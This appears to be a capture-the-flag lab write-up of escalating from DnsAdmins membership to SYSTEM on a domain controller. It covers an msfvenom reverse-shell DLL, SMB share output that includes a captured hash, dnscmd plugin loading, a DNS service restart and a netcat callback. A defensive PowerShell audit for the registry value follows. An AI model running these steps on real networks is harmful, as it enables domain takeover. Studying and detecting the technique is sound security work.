dns-admin-to-dc-compromise

1. List the users who are DNS administrators

net localgroup dnsadmins /domain
Import-Module ActiveDirectory
Get-ADGroupMember -Identity "DNSAdmins"

Control Panel -> Programs and Features -> Turn Windows features on or off -> Remote Server Administration Tools -> Role Administration Tools -> DNS Server Tools.

3. Create a malicious DLL with msfvenom

root@kali:~/htb/# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.70 LPORT=443 -f dll > /root/htb/rev.dll
root@kali:~/htb/# impacket-smbserver share ./
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,61299)
[*] AUTHENTICATE_MESSAGE (M******\R******$,R******)
[*] User R******\R******$ authenticated successfully
[*] R*******::M******:4141414141414141:df242de6e3900faf03e3c66ad44fcf9a:010100000000000080dc8fe768b9d5011264a1bcc0540eab0000-knip-0000000
[*] Disconnecting Share(1:SHARE)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.169,61299)
[*] Remaining connections []

5. Load the DLL on the AD machine with the dnscmd command, which is enabled on the DNS server.

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd 10.10.10.169 /config /serverlevelplugindll \\10.10.16.70\share\rev.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

6. Restart the DNS service

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns 
TYPE : 10 WIN32_OWN_PROCESS 
STATE : 3 STOP_PENDING 
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns 
TYPE : 10 WIN32_OWN_PROCESS 
STATE : 2 START_PENDING 
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2164
FLAGS

7. Catch the connection on the Netcat listener, which receives the callback directly from the AD server. The session also runs as the SYSTEM user (because dns.exe runs with SYSTEM privileges).

root@kali:~/htb# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.169] 61300
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
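As an added defensive check (my code, not part of the original write-up): a PowerShell audit that lists who sits in DnsAdmins and inspects the ServerLevelPluginDll registry value on every domain controller, which is the value dnscmd sets in step 5. It assumes the ActiveDirectory RSAT module and WinRM access to the DCs; the function name Test-DnsServerPluginDll is my own.

```powershell
# Audit for the DnsAdmins -> ServerLevelPluginDll abuse path (added example).
# Assumes: RSAT ActiveDirectory module, WinRM access to the domain controllers.

function Test-DnsServerPluginDll {
    param([string[]]$ComputerName)

    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        # The registry value that dnscmd /config /serverlevelplugindll writes.
        $key   = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
        $value = (Get-ItemProperty -Path $key -Name ServerLevelPluginDll `
                    -ErrorAction SilentlyContinue).ServerLevelPluginDll
        [pscustomobject]@{
            Computer   = $env:COMPUTERNAME
            PluginDll  = $value
            IsUncPath  = ($null -ne $value -and $value -like '\\*')  # DLL pulled from a share
            Suspicious = -not [string]::IsNullOrEmpty($value)       # value is normally absent
        }
    }
}

# 1. Who can set the value: DnsAdmins members, including nested group members.
Import-Module ActiveDirectory
$dnsAdmins = Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
    Select-Object Name, SamAccountName, objectClass
Write-Host 'DnsAdmins members (review each one):'
$dnsAdmins | Format-Table -AutoSize

# 2. Every domain controller (DNS usually runs there): is the plugin value set?
$dnsServers = Get-ADDomainController -Filter * | Select-Object -ExpandProperty HostName
$results    = Test-DnsServerPluginDll -ComputerName $dnsServers
$results | Format-Table Computer, PluginDll, IsUncPath, Suspicious -AutoSize

# Any non-empty value deserves investigation; a UNC path is the pattern used above.
$results | Where-Object Suspicious | ForEach-Object {
    Write-Warning "$($_.Computer): ServerLevelPluginDll = '$($_.PluginDll)'"
}
```

Run it from a privileged admin workstation on a schedule; a non-empty value on a DC you did not configure yourself, combined with a DNS service restart, is the trace this write-up leaves behind.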

Author: Jacco Straathof